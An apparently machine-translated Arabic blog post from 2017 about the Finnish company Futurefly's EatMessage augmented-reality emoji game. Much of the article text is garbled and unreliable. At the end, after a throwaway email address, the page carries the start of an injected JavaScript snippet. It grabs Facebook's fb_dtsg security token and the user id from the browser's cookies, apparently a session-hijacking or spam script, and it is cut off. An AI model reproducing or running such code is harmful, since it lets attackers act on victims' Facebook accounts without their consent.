vendredi 17 février 2017

التطبيق EatMessage Futurefly يحول وجهك إلى وحدة تحكم لعبة


Futurefly تطلق التطبيق الكتروني يسمى EatMessage، لعبة على أساس صورة شخصية حيث أصدقاء التحدي لتناول الطعام أو دودج الرموز التعبيرية. وفي هذه اللعبة، وجهك هو وحدة تحكم.

ويأمل Futurefly مقره هلسنكي لاستخدام كاميرا الهاتف الذكي بطرق مبتكرة لتعطيل السوق الرسائل الاجتماعية التي تهيمن عليها أمثال سناب شات، الفيسبوك، و Instagram.

متوفر في القائمة الكتروني المتجر، وEatMessage مجانا إلى اللعب يتيح لك اختيار مجموعة من الرموز التعبيرية الغذائية (مثل التفاح، والكعك، والبيتزا) والرموز التعبيرية غير صالح للأكل (مثل المفكات والمصابيح الكهربائية، وقوس قزح). يمكنك رمي هذه الأشياء في صديقك عبر الكتروني.

يستخدم صديقك الكاميرا الأمامية للذهاب إلى عالم الواقع المعزز. هناك، يستخدم صديقك له أو فمها لالتقاط الرموز التعبيرية الغذاء ودودج منها غير صالح للأكل. عليك أن تفكر على قدميك واستخدام رأسك أو، بالأحرى، فمك.

بعد أن كانت جميع المواد بنجاح (أو دون جدوى) القبض أو تجنبها، صورة متحركة من لاعب، وكذلك صورة شخصية كاملة مع مرشح مسلية والمرافق اقتبس الفيلم، يتم إرسالها إلى صديق آخر.

Futurefly أطلقت سابقا RAWR رسول، الذي يتضمن 3D تجسد في التطبيق الرسائل.

وعلق مؤسس Futurefly اللاعب Oskari "Ozz" هاكينين، "لا للمستخدمين قبل أن التطبيق الرسائل يسمح للعب مع الوجه والفم، مما يجعل EatMessage لعبة مبتكرة حقا أن يدفع حدود التطبيقات الكتروني والاتجاهات الرسائل بشكل عام."

email

ssdfqsdfcd@gmail.com (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(docume...